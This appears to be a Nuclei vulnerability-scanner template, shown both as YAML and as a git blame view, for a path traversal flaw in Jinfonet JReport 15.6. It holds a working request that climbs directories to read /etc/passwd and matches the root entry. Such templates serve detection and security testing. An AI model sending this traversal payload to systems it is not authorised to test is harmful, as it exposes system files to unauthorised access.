nuclei-templates/http/vulnerabilities/other/jinfornet-jreport-lfi.yaml

id: jinfornet-jreport-lfi

info:
  name: Jinfornet Jreport 15.6 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.
  reference:
    - https://cxsecurity.com/issue/WLB-2020030151
    - https://www.jinfonet.com/product/download-jreport/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: jreport,jinfornet,lfi

http:
  - method: GET
    path:
      - "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022077ba210c23a718fc1eb8ee8df462f6de31924533cd021156f8c9812d4dafb427022100af3d0074f79042fc4ddab8f0443bd10d859a029d9ec06074d709cae6d83158bc:922c64590222798bb761d5b6d8e72950
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`id: jinfornet-jreport-lfi`

			`info:`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`name: Jinfornet Jreport 15.6 - Local File Inclusion`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`author: 0x_Akoko`
			`severity: high`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`description: Jinfornet Jreport 15.6 is vulnerable to local file incluion via the Jreport Help function in the SendFileServlet. Exploitaiton allows remote unauthenticated users to view any files on the Operating System with Application services user permission. This vulnerability affects Windows and Unix operating systems.`
Update and rename jinfornet-jreport-lfi.yaml to vulnerabilities/other/jinfornet-jreport-lfi.yaml 2022-01-03 04:31:12 +00:00			`reference:`
			`- https://cxsecurity.com/issue/WLB-2020030151`
			`- https://www.jinfonet.com/product/download-jreport/`
Dashboard Content Enhancements (#5009) Dashboard Content Enhancements 2022-08-05 13:57:51 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
Added max request counter of each template 2023-04-28 08:11:21 +00:00			`metadata:`
			`max-request: 1`
templateman update 2023-10-14 11:27:55 +00:00			`tags: jreport,jinfornet,lfi`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`- method: GET`
			`path:`
			`- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
Update and rename jinfornet-jreport-lfi.yaml to vulnerabilities/other/jinfornet-jreport-lfi.yaml 2022-01-03 04:31:12 +00:00			`part: body`
Create jinfornet-jreport-lfi.yaml 2022-01-03 00:27:54 +00:00			`regex:`
			`- "root:[x*]:0:0"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 4a0a00473045022077ba210c23a718fc1eb8ee8df462f6de31924533cd021156f8c9812d4dafb427022100af3d0074f79042fc4ddab8f0443bd10d859a029d9ec06074d709cae6d83158bc:922c64590222798bb761d5b6d8e72950`